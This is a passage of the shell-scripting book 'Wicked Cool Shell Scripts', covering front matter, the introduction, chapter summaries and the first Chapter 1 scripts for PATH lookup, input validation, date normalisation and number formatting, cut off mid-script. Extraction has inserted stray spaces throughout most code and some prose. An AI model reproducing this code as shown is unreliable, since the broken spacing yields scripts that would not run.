You are on page 1of 293

Wicked Cool Shell Scripts: 101 Scripts for Linux, Mac OS X, and Unix

Systems
by Dave Taylor

ISBN:1593270127

No Starch Press 2004


This cookbook of useful, customizable, and fun scripts gives you the tools to solve
common Linux, Mac OS X and UNIX problems and personalize your computing
environment.

Table of Contents
Wicked Cool Shell Scripts101 Scripts for Linux, Mac OS X, and Unix Systems
Introduction
Chapter 1

- The Missing Code Library

Chapter 2

- Improving on User Commands

Chapter 3

- Creating Utilities

Chapter 4

- Tweaking Unix

Chapter 5

- System Administration: Managing Users

Chapter 6

- System Administration: System Maintenance

Chapter 7

- Web and Internet Users

Chapter 8

- Webmaster Hacks

Chapter 9

- Web and Internet Administration

Chapter 10 - Internet Server Administration


Chapter 11 - Mac OS X Scripts
Chapter 12 - Shell Script Fun and Games
Afterword
Index
List of Figures
List of Tables

Back Cover
The UNIX shell is the main scripting environment of every Linux, Mac OS X and UNIX system,
whether a rescued laptop or a million-dollar mainframe. This cookbook of useful, customizable, and
fun scripts gives you the tools to solve common Linux, Mac OS X and UNIX problems and
personalize your computing environment. Among the more than 100 scripts included are an
interactive calculator, a spell checker, a disk backup utility, a weather tracker, and a web logfile
analysis tool. The book also teaches you how to write your own sophisticated shell scripts by
explaining the syntax and techniques used to build each example scripts. Examples are written in
Bourne Shell (sh) syntax.
About the Author
Dave Taylor has a Masters degree in Education, an MBA, and has written a dozen technical books,
including Learning UNIX for Mac OS X (O'Reilly), Solaris for Dummies (Hungry Minds), and Teach
Yourself UNIX in 24 Hours (SAMS). He was a contributor to BSD 4.4 UNIX, and his software is
included in many major UNIX distributions.

Wicked Cool Shell Scripts101 Scripts for Linux, Mac OS X,


and Unix Systems
by Dave Taylor

San Francisco
Copyright 2004 by Dave Taylor.
All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or
mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior
written permission of the copyright owner and the publisher.
Printed on recycled paper in the United States of America
1 2 3 4 5 6 7 8 9 10 - 06 05 04 03
No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and
company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark
symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the
benefit of the trademark owner, with no intention of infringement of the trademark.
Publisher: William Pollock
Managing Editor: Karol Jurado
Cover and Interior Design: Octopod Studios
Technical Reviewer: Richard Blum
Copyeditor: Rebecca Pepper
Compositor: Wedobooks
Proofreader: Stephanie Provines
Indexer: Kevin Broccoli
Kevin & Kell strip on page 209 reproduced with permission of Bill Holbrook, creator of Kevin & Kell.
For information on translations or book distributors, please contact No Starch Press, Inc. directly:
No Starch Press, Inc.
555 De Haro Street, Suite 250, San Francisco, CA 94107
phone: 415-863-9900; fax: 415-863-9950; <info@nostarch.com>; http://www.nostarch.com
The information in this book is distributed on an "As Is" basis, without warranty. While every precaution has been
taken in the preparation of this work, neither the author nor No Starch Press, Inc. shall have any liability to any person
or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information
contained in it.
Library of Congress Cataloguing-in-Publication Data
Taylor, Dave.
Wicked cool shell scripts / Dave Taylor.
p. cm.

ISBN 1-59327-012-7
1. UNIX (Computer file) 2. UNIX Shells. I. Title.
QA76.76.O63T3895 2004
005.4'32--dc22
2003017496

Introduction
If you've used Unix for any length of time, you've probably found yourself starting to push the envelope, tweak how
things work, change the default flags for commands you use a lot, and even create rudimentary shell scripts that
automate simple tasks in a coherent fashion. Even if all you've done is to create an alias or two, you've taken the first
step on the road to being a shell script hacker extraordinaire, as you'll soon see.
I've been using Unix for more years than I want to think about, and it's a great OS, especially because I can tweak,
tune, and hack it. From simply automating common tasks to creating sophisticated, user-friendly versions of existing
Unix commands, and creating brand-new utilities that serve a useful purpose, I've been creating spiffo little shell scripts
for quite a while.
This book is about making Unix a friendlier, more powerful, and more personal computing environment by exploiting
the remarkable power and capabilities of the shell. Without writing a single line of C or C++, without invoking a single
compiler and loader, and without having to take any classes in program design and methodology, you'll learn to write
dozens of wicked cool shell scripts, ranging from an interactive calculator to a stock ticker monitor, and a set of scripts
that make analyzing Apache log files a breeze.

This Book Is for You If...


As with any technical book, an important question for Wicked Cool Shell Scripts is whether this book is for you. While
it's certainly not a primer on how to use the Unix, Linux, or Mac OS X shell to automate tasks, and it doesn't list all the
possible conditional tests that you can utilize with the t e st command, this book should nonetheless be engaging,
exciting, and stimulating for anyone who has ever delved into the murky world of shell scripting. If you want to learn
how to write a script, well, there are lots of great references online. But they all have one thing in common: They offer
dull, simple, and uninteresting examples. Instead, this book is intended to be a cookbook, a sort of "best of" hacks
compendium that shows the full and remarkable range of different tasks that can be accomplished with some savvy
shell script programming. With lengths ranging from a few dozen lines to a hundred or more, the scripts in this book
should not just prove useful, but will hopefully inspire you to experiment and create your own shell scripts too. And if
that sounds interesting, well, this book is definitely for you.

What Is a Shell Script, Anyway?


Time was (years ago) when hacking was considered a positive thing. Hackers were people on the cutting edge of
computer use, experimenting with and trying novel and unusual solutions to solve existing problems. These were people
who changed the way the rest of us looked at computers and computing.
But as the public network became more pervasive, a subset of these hackers started to migrate to remote system
break-in missions, with a zeal that rather overwhelmed the rest of us. Nowadays, many consider hacking a bad thing,
as in "hacking into the secure Department of Energy database." However, I like to think of hacking as being a more
benign, intellectually engaging, and considerably less criminal enterprise, more akin to the wonderful praise a computer
aficionado can offer with the compliment "Cool hack!"
This book is about cool shell script hacks.

Which Shell?
There are at least a dozen Unix shells floating around, but they're all based on two major flavors: Bourne Shell (sh)
and C Shell (c s h). The most important shells in the Unix and Linux world are the Bourne Shell, C Shell, Korn Shell (a
descendant of C Shell), and Bourne Again Shell (b ash ).
The original command shell of note is the Bourne Shell, written by Steven Bourne at AT&T Bell Labs in the early days
of Unix. It's probably still on your Unix box as /b in/ sh, and while it's not sexy, and its syntax may be a bit odd, it's a
simple and powerful scripting environment so sufficiently common across Unixes that it's the lingua franca of the shell
scripting world.
The Free Software Foundation's open source reimplementation of the Bourne Shell goes by the name of b ash , the
Bourne Again Shell. It is a lot more than just a reimplementation of a 20-year-old command shell, however; it's both a
great scripting environment and a highly capable interactive user shell. On many Linux systems, /bi n/sh is actually
a hard link to ba sh .
And then there is the C Shell, UC Berkeley's most important innovation in the realm of shell script hacking. The C Shell
replaced the odd Bourne Shell syntax with a command syntax more like its namesake language, C.
As with many facets of Unix, passions are strong about which scripting environment is the best, with three predominant
camps: Bourne Shell, Korn Shell, and C Shell. But all is not equal. Consider the well-known article "Csh Programming
Considered Harmful" [1 ] whose author, Tom Christiansen, points out, quite correctly:
I am continually shocked and dismayed to see people write test cases, install scripts, and other
random hackery using the c sh. Lack of proficiency in the Bourne shell has been known to cause
errors in / e tc/ r c and . c ron rc files, which is a problem, because you must write these files in
that language.
The c s h is seductive because the conditionals are more C-like, so the path of least resistance is
chosen and a c s h script is written. Sadly, this is a lost cause, and the programmer seldom even
realizes it, even when they find that many simple things they wish to do range from cumbersome to
impossible in the csh .
I agree wholeheartedly with Tom, and hence in this book we will eschew the use of the C Shell. If you're a strong
advocate of the C Shell, well, you should find it easy to rewrite almost all of the scripts in this book to fit your shell.
Similarly, many people are advocates of the Korn Shell, which has a terrific interactive command line but, I feel, is less
capable as a scripting environment.
When evaluating a shell, consider both its interactive capabilities (such as aliases, command-line history, on-the-fly
spelling corrections, helpful error messages) and its scripting capabilities. This book focuses on the scripting side of
things, and so the scripts presented here will be Bourne Shell scripts (with an occasional sprinkling of bash or POSIX
shell tweaks for entertainment value) and should work just fine on any Unix you may have.

The Solaris Factor


If you're working on a Solaris system, you've got a bit of a problem, but not one that can't be solved. The scripts in this
book are all written against the POSIX 1003 standard for the Bourne Shell, which includes functions, variable slicing,
$() notation as a smarter alternative to backticks, and so on. So what's the problem? The default /b in/s h in
Solaris 9 and earlier is not POSIX-compliant, which causes a huge hassle.
Fortunately, you can fix it, in one of two ways:
1. Replace /b i n/s h with a hard link to /u sr/x pg4/ bin/ sh , the POSIX-compliant shell in Solaris.
This might be a bit radical, and there's a tiny chance it'll break other things in Solaris, so I'd be
cautious about this choice.
2. In every single script in this book, replace the # !/bi n/sh first line with # !/us r/
xp g 4/b i n/s h , which is straightforward. This has the added advantage of allowing you to automate
the process with a f or loop similar to the following:
# T his ass u mes tha t yo u'r e in the Wic ked Co ol S hell Scr ipts sc ript dir ecto ry!
fo r sc r ipt in *
do
s ed ' s|# ! /bi n/sh |#!/ usr /xpg 4/bi n/sh |' < $ scri pt > out file
m v o u tfi l e $ scri pt
do n e
Hopefully, with the release of Solaris 10 Sun will just say "ciao!" to the legacy problems and include a POSIX-compliant
version of the Bourne Shell as the default /bin /sh , and this will all go away as a problem.
[1 ] Online at ht tp : //w w w.f a qs. o rg/ faqs /un ix-f aq/s hell /csh -w hyno t/

Organization of This Book


This book is organized into 12 chapters that reflect the wide range of different ways that shell scripts can improve and
streamline your use of Unix. If you're a Mac OS X fan as I am rest assured that almost every script in this book
will work just fine in both Jaguar and Panther, with the exception of those scripts that check the / e tc /p a ss wd file for
account information. (The user password information is in the NetInfo database instead. Visit the book's website for a
discussion of this issue and how to work with n i rep o r t and ni du mp instead.)

Chapter 1: The Missing Code Library


Programming languages in the Unix environment, particularly C and Perl, have extensive libraries of useful functions
and utilities to validate number formats, calculate date offsets, and perform many more useful tasks. When working with
the shell, you're left much more on your own, so this first chapter focuses on various tools and hacks to make shell
scripts more friendly, both throughout this book and within your own scripts. I've included various input validation
functions, a simple but powerful scriptable front end to bc, a tool for quickly adding commas to improve the
presentation of very large numbers, a technique for sidestepping Unixes that don't support the helpful -n flag to e ch o,
and an include script for using ANSI color sequences in scripts.

Chapters 2 and 3: Improving Commands and Creating Utilities


These two chapters feature new commands that extend and expand Unix in various helpful ways. Indeed, one
wonderful aspect of Unix is that it's always growing and evolving, as can be seen with the proliferation of command
shells. I'm just as guilty of aiding this evolution as the next hacker, so this pair of chapters offers scripts that implement
a friendly interactive calculator, an unremove facility, two different reminder/event-tracking systems, a reimplementation
of the locat e command, a useful front end to the spelling facility, a multi-time-zone d at e command, and a new
version of ls that increases the use-fulness of directory listings.

Chapter 4: Tweaking Unix


This may be heresy, but there are aspects of Unix that seem to be broken, even after decades of development. If you
move between different flavors of Unix, particularly between open source Linux distributions and commercial Unixes
like Solaris and HP-UX, you are aware of missing flags, missing commands, inconsistent commands, and similar
issues. Therefore, this chapter includes both rewrites and front ends to Unix commands to make them a bit friendlier or
more consistent with other Unixes. Scripts include a method of adding GNU-style full-word command flags to non-GNU
commands and a couple of smart scripts to make working with the various file-compression utilities considerably easier.

Chapters 5 and 6: System Administration Tools


If you've picked up this book, the odds are pretty good that you have both administrative access and administrative
responsibility on one or more Unix systems, even if it's just a personal Debian Linux or FreeBSD PC. (Which reminds
me of a joke: How do you fix a broken Windows PC? Install Linux!) These two chapters offer quite a few scripts to
improve your life as an admin, including disk usage analysis tools, a disk quota system that automatically emails users
who are over their quota, a tool that summarizes which services are enabled regardless of whether you use i ne td or
x in etd , a k ill al l reimplementation, a cr o nta b validator, a log file rotation tool, and a couple of backup
utilities.

Chapter 7: Web and Internet Users


If you've got a computer, you've also doubtless got an Internet connection. This chapter includes a bunch of really cool
shell script hacks that show how the Unix command line can offer some wonderful and quite simple methods of
working with the Internet, including a tool for extracting URLs from any web page on the Net, a weather tracker, a
movie database search tool, a stock portfolio tracker, and a website change tracker with automatic email notification
when changes appear.

Chapter 8: Webmaster Hacks


The other side of the web coin, of course, is when you run a website, either from your own Unix system or on a shared
server elsewhere on the network. If you're a webmaster or an ISP, the scripts in this chapter offer quite interesting tools
for building web pages on the fly, processing contact forms, building a web-based photo album, and even the ability to
log web searches. This chapter also includes a text counter and complete guest book implementation, all as shell
scripts.

Chapters 9 and 10: Web and Internet Administration

These two chapters consider the challenges facing the administrator of an Internet server, including two different scripts
to analyze different aspects of a web server traffic log, tools for identifying broken internal or external links across a
website, a web page spell-check script, and a slick Apache web password management tool that makes keeping an
. ht acc e ss file accurate a breeze. Techniques for mirroring directories and entire websites with mirroring tools are
also explored.

Chapter 11: Mac OS X Scripts


The Macintosh operating system is a tremendous leap forward in the integration of Unix and an attractive, commercially
successful graphical user interface. More importantly, because every Mac OS X system includes a complete Unix
hidden behind the pretty interface, there are a number of useful and educational scripts that can be written, and that's
what this chapter explores. In addition to a rewrite of a d dus e r , allowing new Mac OS X user accounts to be set up
in seconds from the command line, scripts in this chapter explore how Macs handle email aliases, how iTunes stores its
music library, and how to change Terminal window titles and improve the useful o p en program.

Chapter 12: Fun and Games


What's a programming book without at least a few games? This last chapter integrates many of the most sophisticated
techniques and ideas in the book to present three fun and challenging games. While entertaining, the code for each is
also well worth studying as you read through this last chapter. Of special note is the hangman game, which shows off
some smart coding techniques and shell script tricks.

The Website
The official website for this book can be found at http://www.intutive.com/wicked/
You'll find all the scripts discussed in this book as well as several bonus scripts, including games, some Mac OS Xspecific hacks, and others that didn't make the final cut for the book, but which are still worth examination and study.
You'll also find a link to the official errata list for this book (worth checking especially if you're finding that a script isn't
working for you) and information about the many other books I've written on Unix and web-related topics.

Acknowledgments
A remarkable number of people have contributed to the creation and development of this book, most notably Dee-Ann
LeBlanc, my first-generation tech reviewer and perpetual IM buddy, and Richard Blum, tech editor and scripting expert,
who offered significant and important commentary regarding the majority of the scripts in the book. Nat Torkington
helped with the organization and robustness of the scripts. Others who offered invaluable assistance during the
development phase include Andrey Bronfin, Martin Brown, Brian Day, Dave Ennis, Werner Klauser, Eugene Lee, Andy
Lester, and John Meister. The MacOSX.com forums have been helpful (and are a cool place to hang out online), and
the AnswerSquad.com team has offered great wisdom and infinite opportunities for procrastination. Finally, this book
wouldn't be in your hands without the wonderful support of Bill Pollock and stylistic ministrations of Hillel Heinstein,
Rebecca Pepper, and Karol Jurado: Thanks to the entire No Starch team!
I'd like to acknowledge the support of my family, Linda, Ashley, and Gareth. Though there's always something going on
and someone wanting to play, some-how they've given me enough room to develop a tremendous number of scripts
and write a book about it all. Amazing!

Finally ...
I hope you enjoy this book, find the scripts useful and interesting, and perhaps get more of a sense of the power and
sophistication of the shell programming environment along the way, which is certainly more powerful and capable than
most people realize. And fun. Did I mention that writing shell scripts is great fun? :-)
Dave Taylor
<taylor@intuitive.com>
htt p: //w ww .int uiti ve.c o m /
P.S. Please don't forget to check out AnswerSquad h t tp: / / ww w. an s we r sq ua d .c om / the next time you're
online. Staffed by dozens of computer experts for whom wicked cool is all in a day's work, it's unquestionably your best
option for computer technical support regardless of platform or software. I should know: I'm part of the team!

Chapter 1: The Missing Code Library


Overview
Unix's greatest strength is that it lets you create new commands by combining old ones in unique and novel ways.
However, although Unix includes hundreds of commands and there are thousands of ways to combine them, you will
still encounter situations in which nothing does the job quite right. This chapter focuses on scripts that allow you to
create smarter and more sophisticated programs within the constraints of shell scripts.
There's a secret that we should address up front: The shell script programming environment isn't as sophisticated as a
real programming environment. Perl, Python, and even C have structures and libraries that offer extended capabilities,
but shell scripts are more of a "roll your own" world. The scripts in this chapter will help you make your way in that
world. They'll serve as a set of tools that will let us write better, smarter, more sophisticated scripts later in the book.
Much of the challenge of script writing arises from the subtle variations between different flavors of Unix. While the IEEE
POSIX standards supposedly provide a common base of functionality across different Unix implementations, it can still
be confusing to use a Solaris system after a year in a Red Hat Linux environment. The commands are different, they're
in different locations, and they often have subtly different command flags. These variations can make writing shell
scripts difficult too, as you may imagine.

What Is POSIX?
The early days of Unix were like the mythical Wild West, with companies innovating and taking the operating system in
quite different directions while simultaneously assuring customers that the new operating systems were compatible and
just like the other Unixes. The Institute for Electrical and Electronic Engineers (IEEE) stepped in and, with a
tremendous amount of effort from all the major Unix vendors, created a standard version of Unix called POSIX, against
which all the commercial and open source Unix implementations are measured. You can't buy a POSIX operating
system per se, but the Unix or Linux you run is POSIX compliant.
Yet even POSIX-compliant Unix implementations can vary. One example of this that will be addressed later in this
chapter involves the ech o command. Some versions of this command support an -n flag, which disables the trailing
newline that's a standard part of the command execution. Other versions of e ch o support the \ c escape sequence as
a special "don't include a newline" notation, while still others ignore it all and have no apparent way to avoid newlines.
To make things even more puzzling, some command shells have a built-in e ch o function that ignores the -n and \ c
flags, while the same Unix system usually also has a stand-alone binary /b in / ec h o that understands these flags.
This makes prompting for input in a shell script quite tough, because ideally the script should work identically on as
many Unix systems as possible. For functional scripts, needless to say, it's critical to normalize the e ch o command,
and that's just one of the many scripts included in this book.
Let's get started looking at actual scripts to include in our shell script library.

#1 Finding Programs in the PATH


Shell scripts that use environment variables (like MAILER and PAGER) have a hidden danger: Some of their settings
may well point to nonexistent programs. For example, if you decide to be flexible by using the PAGER setting to
display script output, instead of just hard-coding a specific tool, how do you ensure that the PAGER value is set to a
valid program? After all, if it's not a valid program, your script will break. This first script addresses how to test whether
a given program can be found in the user's PATH, and it's also a good demonstration of a number of different shell
scripting techniques, including script functions and variable slicing.

The Code
# !/ bin / sh
# i npa t h - V eri fi es t hat a spe c ifi e d pr o g ra m is ei th e r v al id as i s ,
#
or tha t it ca n be fou nd in the P ATH d ir ec to r y li s t.
i n_ pat h ()
{
# Gi v en a com ma nd a nd t he PA T H, t r y t o fi nd t h e co m ma n d. R e tu rn s
# 0 i f f ou nd an d ex ecut able, 1 i f not . No te t h at t h is te mp o ra ri l y mo d if ie s
# th e IF S (in pu t fi eld separ a tor ) but r es to re s i t u po n c om p le ti o n.
c md= $ 1
o ldI F S=$ IF S

p ath= $2
I FS=" :"

re t v al= 1

f or d ire ct ory i n $p ath


do
if [ - x $di re ctor y/$c md ] ; th e n
r etv al =0
# if we're her e , we f ou nd $ c md i n $ d ir ec t or y
fi
d one
I FS= $ old IF S
r etu r n $ re tva l

c he ckF o rCm dI nPa th ()


{
v ar= $ 1
#
#
#
#
#
#

Th e va ri abl e slic ing notat i on i n th e fo ll ow i ng c o nd i ti on a l


ne e ds so me ex plan atio n: ${ v ar# e x pr} r et ur ns ev er y th i ng a f te r
th e ma tc h f or 'ex pr' in th e va r i abl e va lu e ( if a n y) , a nd
${ v ar% ex pr} r etur ns e veryt h ing t hat d oe sn 't ma tc h ( i n th i s
ca s e, ju st th e ve ry f irst c har a c ter . Yo u ca n a ls o d o t hi s i n
Ba s h w it h $ {v ar:0 :1}, and y ou c o uld u se c ut to o: cu t - c1 .

i f [ "$v ar " ! = "" ] ; t hen


if [ " ${ var %$ {var #?}} " = " / " ] ; th e n
i f [ ! -x $ var ] ; then
re tu rn 1
fi
el i f ! i n_p at h $v ar $ PATH ; th e n
r etu rn 2
fi
fi

Where to put your scripts

I recommend that you create a new directory called "scripts,"


probably as a part of your HOME directory, and then add that fully
qualified directory name to your PATH variable. (Use e ch o
$PA T H to see your current PATH, and edit the contents of your
.login or .profile (depending on the shell) to modify your PATH
appropriately.)

Running the Script


To run this script, we first need to append a short block of commands to the very end of the file. These commands
pass a starting parameter to the validation program and check the return code, like so:
i f [ $ # -n e 1 ] ; the n
ec ho " Usa ge : $ 0 comm and" >&2 ; ex i t 1
fi
c he ckF o rCm dI nPa th "$1 "
c as e $ ? in
0 ) e cho " $1 fo und in P ATH"
1 ) e cho " $1 no t fo und or no t ex e c uta b l e"
2 ) e cho " $1 no t fo und in PA T H"
e sa c

;;
;;
;;

e xi t 0
Once you've added the additional code snippet, you can invoke this script directly, as shown in "The Results," next.
Make sure to remove or comment out the additional code before you're done with this script, however, so its later
inclusion as a library function doesn't mess things up.

The Results
To test the script, let's invoke inpat h with the names of three programs: a program that exists, a program that exists
but isn't in the PATH, and a program that does not exist but that has a fully qualified filename and path:
$ i npa t h e ch o
e ch o f o und i n P AT H
$ i npa t h M rE cho
M rE cho not f oun d in P ATH
$ i npa t h / us r/b in /MrE cho
/ us r/b i n/M rE cho n ot f ound or n o t e x e cut a b le

Hacking the Script


Perhaps the most unusual aspect of this code is that it uses the POSIX variable slicing method of $ {v ar % ${ va r #?
} }. To understand this notation, realize that the apparent gobbledygook is really two nested string slices. The inner
call, ${v a r#? }, extracts everything but the first character of the variable v ar (? is a regular expression that
matches one character). Next, the call ${var % pat t e rn} produces a substring with everything left over once the
specified pattern is applied to the inner call. In this case, what's left is the first character of the string.
This is a pretty dense explanation, admittedly, but the key to getting ch e ck - F or C md In P at h to work is for it to be
able to differentiate between variables that contain just the program name (like e ch o ) and variables that contain a full
directory path plus the filename (like "/b in/e c h o"). It does this by examining the very first character of the given
value to see if it's a "/" or not; hence the need to isolate the first character from the rest of the variable value.
If this POSIX notation is too funky for you, Bash and Ksh support another method of variable slicing. The substring
function ${v ar nam e: sta rt :siz e} requests a certain number of characters from va r na me specified by s iz e
and beginning with the character number in v a rna m e specified by s t ar t. For example, $ {v ar n am e: 1 :1 } would
produce a substring consisting of just the first character of v a r na me . Of course, if you don't like either of these
techniques for extracting just the first character, you can also use a system call: $ (e ch o $ va r | c u t -c 1 ).
Note Script #47 in the Administrative Tools chapter is a useful script that's closely related to this one. It validates
both the directories in the PATH and the environment variables in the user's login environment.

#2 Validating Input: Alphanumeric Only


Users are constantly ignoring directions and entering data that's inconsistent or incorrectly formatted, or that uses
incorrect syntax. As a shell script developer, you need to intercept and correct these errors before they become
problems.
A typical situation you may encounter in this regard involves filenames or database keys. You prompt the user for a
string that's supposed to be made up exclusively of uppercase characters, lowercase characters, and digits. No
punctuation, no special characters, no spaces. Did they enter a valid string or not? That's what this script tests.

The Code
# !/ bin / sh
# v ali d Alp ha Num - Ens ures that inp u t co n s is ts o n ly o f a l ph ab e ti ca l
# a nd n ume ri c c ha ract ers.
v al idA l pha Nu m()
{
# Va l ida te ar g: ret urns 0 if all u ppe r + lo we r+ d ig it s , 1 o th e rw is e
# Re m ove a ll un acce ptab le ch a rs
c omp r ess ed ="$ (e cho $1 | sed - e ' s / [^[ : a ln um :] ] // g' ) "

i f [ "$c om pre ss ed" != " $inpu t " ] ; th e n


re t urn 1
e lse
re t urn 0
fi

# S amp l e u sa ge of thi s fu nctio n in a sc r i pt


e ch o - n "E nt er in put: "
r ea d i n put
i f ! v a lid Al pha Nu m "$ inpu t" ; t hen
e cho "Yo ur in pu t mu st c onsis t of o nly l et te rs an d n um b er s. " > &2
e xit 1
e ls e
e cho "In pu t i s vali d."
fi
e xi t 0

How It Works
The logic of this script is straightforward. First, it transforms the input with a s ed - based transform to create a new
version of the input data, and then it compares the new version with the original. If the two versions are the same, all is
well. If not, the transform lost data that wasn't part of the acceptable alphanumeric (alphabetic plus numeric) character
set, and the input was unacceptable.
Specifically, the s ed substitution is for any characters not in the set [ :a ln u m: ] , the POSIX shorthand for the local
definition of all upper-and lowercase characters and digits (a lnu m stands for alphanumeric). If this new, compressed
value doesn't match the input entered earlier, the removal of all the alphanumeric values reveals nonalphanumeric
values in the input string (which is illegal) and the function returns a nonzero result, indicating a problem.

Running the Script


This particular script is self-contained. It prompts for input and then informs you whether the result is valid or not. A
more typical use of this function, however, would be to include it at the top of another shell script or in a library, as
shown in Script #12, Building a Shell Script Library.
This script is a good example of a general shell script programming technique. Write your functions and then test them
before you integrate them into larger, more complex scripts. It'll save lots of headaches.

The Results
$ v ali d aln um
E nt er i npu t: va li d123 SAMP LE
I np ut i s v al id.
$ v ali d aln um
E nt er i npu t: th is is most assu r edl y NOT v al id , 1 23 45
Y ou r i n put m ust c onsi st o f onl y le t t ers a nd n um b er s.

Hacking the Script


This "remove the good characters and then see what's left" approach is nice because it's tremendously flexible. Want to
force uppercase letters but also allow spaces, commas, and periods? Simply change the substitution pattern:
s ed 's / [^[ :u ppe r: ] ,. ]//g '
A simple test for valid phone number input (allowing integer values, spaces, parentheses, and dashes) could be
s ed 's / [^[ :d igi t: ]\(\ )- ] //g'
To force integer values only, though, beware of a pitfall. You might try the following:
s ed 's / [^[ :d igi t: ]]// g'
But what if you want to permit entry of negative numbers? If you just add the minus sign to the valid character set, -34 would be a valid input, though it's clearly not a legal integer. The particular issue of handling negative numbers is
addressed in Script #5, Validating Integer Input, later in this chapter.

#3 Normalizing Date Formats


One problematic issue with shell script development is the number of inconsistent data formats; normalizing them can
range from tricky to quite difficult. Date formats are some of the most challenging to work with because a date can be
specified in several different ways. Even if you prompt for a specific format, like "month day year," you're likely to be
given inconsistent input: a month number instead of a month name, an abbreviation for a month name, or a full name in
all uppercase letters.
For this reason, a function that normalizes dates, though rudimentary on its own, will prove to be a very helpful building
block for subsequent script work, especially Script #7, Validating Date Formats.

The Code
# !/ bin / sh
# n orm d ate - - N or mali zes month fie l d in d at e sp e ci fi c at i on
# t o t h ree l ett er s, f irst lett e r c a p ita l i ze d. A he lp e r
# f unc t ion f or Sc ript #7, vali d -da t e . E x i ts w / z er o i f n o er r or .
m on thn o ToN am e()
{
# Se t s t he va ri able 'mo nth' t o t h e ap p r op ri at e v al u e
c ase $1 in
1 ) mo nt h=" Ja n"
;;
2 ) mon t h ="F e b "
;;
3 ) mo nt h=" Ma r"
;;
4 ) mon t h ="A p r "
;;
5 ) mo nt h=" Ma y"
;;
6 ) mon t h ="J u n "
;;
7 ) mo nt h=" Ju l"
;;
8 ) mon t h ="A u g "
;;
9 ) mo nt h=" Se p"
;;
10) mon t h ="O c t "
;;
11 ) mo nt h=" No v"
;;
12) mon t h ="D e c "
;;
* ) ec ho "$ 0: Unk nown nume r ic m o nth v al ue $ 1 " >& 2 ; e xi t 1
esa c
ret u rn 0
}
# # Beg i n m ai n s cr ipt
i f [ $ # -n e 3 ] ; the n
e cho "Us ag e: $0 mon th d ay ye a r" > & 2
e cho "Ty pi cal i nput for mats a re A u gus t 3 19 62 an d 8 3 20 02 " > &2
e xit 1
fi
i f [ $ 3 -l t 99 ] ; th en
e cho "$0 : exp ec ted four -digi t ye a r va l u e. " >& 2 ; ex i t 1
fi
i f [ - z $( ec ho $1 |sed 's/ [[:di g it: ] ] //g ' ) ] ; th e n
m ont h noT oN ame $ 1
e ls e
# No r mal iz e t o firs t th ree l e tte r s , f i r st u pp e r, r e st lo we r ca se
m ont h ="$ (e cho $ 1|cu t -c 1|tr ' [:l o w er: ] ' ' [: up p er :] ' )"
m ont h ="$ mo nth $( echo $1| cut - c 2-3 | tr ' [: up pe r :] ' ' [: l ow er : ]' )"
fi
e ch o $ m ont h $2 $3
e xi t 0

How It Works
Notice the third conditional in this script:
i f [ - z $( ec ho $1 |sed 's/ [[:di g it: ] ] //g ' ) ] ; th e n
It strips out all the digits and then uses the -z test to see if the result is blank or not. If the result is blank, the first
input field must be a digit or digits, so it's mapped to a month name with a call to mo n th no T oN am e . Otherwise, a

complex sequence of cu t and tr pipes follows to build the value of mo n th by having two subshell-escaped
sequences (that is, sequences surrounded by $( and) so that the enclosed command is invoked and its output
substituted). The first of the sequences shown here extracts just the first character and forces it to uppercase with t r .
(The sequence ec ho $1 |c ut - c1 could also be written as $ {1 %$ {1 # ?} } in the POSIX manner, as seen
earlier.) The second of the sequences extracts the second and third characters and forces them to be lowercase:
m on th= " $(e ch o $ 1| cut -c1| tr '[ : low e r :]' ' [: up pe r :] ') "
m on th= " $mo nt h$( ec ho $ 1|cu t -c2 - 3 | t r ' [ : up pe r: ] ' '[ : lo w er :] ' )"

Running the Script


To ensure maximum flexibility with future scripts that incorporate the no r md at e functionality, this script was designed
to accept input as three fields entered on the command line. If you expected to use this script only interactively, by
contrast, you'd prompt the user for the three fields, though that would make it more difficult to invoke no rm d at e from
other scripts.

The Results
This script does what we hoped, normalizing date formats as long as the format meets a relatively simple set of criteria
(month name known, month value between 1 and 12, and a four-digit year value). For example,
$ n orm d ate 8 3 62
n or mda t e: ex pec te d fo ur-d igit y ear v alu e .
$ n orm d ate 8 3 19 62
A ug 3 1 962
$ n orm d ate A UGU ST 3 1 962
A ug 3 1 962

Hacking the Script


Before you get too excited about the many extensions you can add to this script to make it more sophisticated, check
out Script #7, which uses n or mdat e to validate input dates. One modification you could make, however, would be to
allow the script to accept dates in the format MM/DD/YYYY or MM-DD-YYYY by adding the following snippet
immediately before the test to see if three arguments are specified:
i f [ $ # -e q 1 ] ; the n # try t o co m p ens a t e fo r / o r - f o rm at s
s et - - $ (e cho $ 1 | sed 's/[\ / \-] / /g' )
fi
With this modification, you could also enter the following common formats and normalize them too:
$ n orm d ate M arc h- 11-1 911
M ar 11 191 1
$ n orm d ate 8 /3/ 19 62
A ug 3 1 962

#4 Presenting Large Numbers Attractively


A common mistake that programmers make is to present the results of calculations to the user without first formatting
them. It's difficult for users to ascertain whether 43245435 goes into the millions without manually counting from right to
left and mentally inserting a comma every three digits. Use this script to format your results.

The Code
# !/ bin / sh
# n ice n umb er -- G iven a n umber , sh o w s i t in c om m a- se p ar a te d f or m.
# E xpe c ts DD an d TD t o be inst a nti a t ed. I ns ta nt i at es ni c en um
# o r, i f a s eco nd arg is speci f ied , the o ut pu t i s ec h oe d t o s td ou t .
n ic enu m ber ()
{
# No t e t ha t w e assu me t hat ' . ' i s the d ec im al se pa r at o r in
# th e IN PU T v al ue t o th is sc r ipt . The d ec im al se pa r at o r in th e o ut pu t v al u e is
# '. ' un le ss sp ecif ied by th e us e r wi t h t he - d f la g
i nte g er= $( ech o $1 | cut -d. - f1)
d eci m al= $( ech o $1 | cut -d. - f2)

# le f t o f th e d ec i ma l
# ri g ht of t h e de c im al

i f [ $de ci mal ! = $1 ]; then


# T her e' s a f ract iona l par t , s o let ' s i nc lu d e it .
re s ult =" ${D D: ="." }$de cimal "
fi
t hou s and s= $in te ger
w hil e [ $t hou sa nds -gt 999 ] ; do
re m ain de r=$ (( $tho usan ds % 1 000 ) )
wh i le [ ${# re main der} -lt 3 ] ; do
r ema in der =" 0$re main der"
do n e

# t hr ee le as t s i gn if i ca nt di gi t s
# f or ce le ad i ng ze ro s a s n ee de d

th o usa nd s=$ (( $tho usan ds / 1 000 ) )


# t o le f t of re m ai nd e r, i f a ny
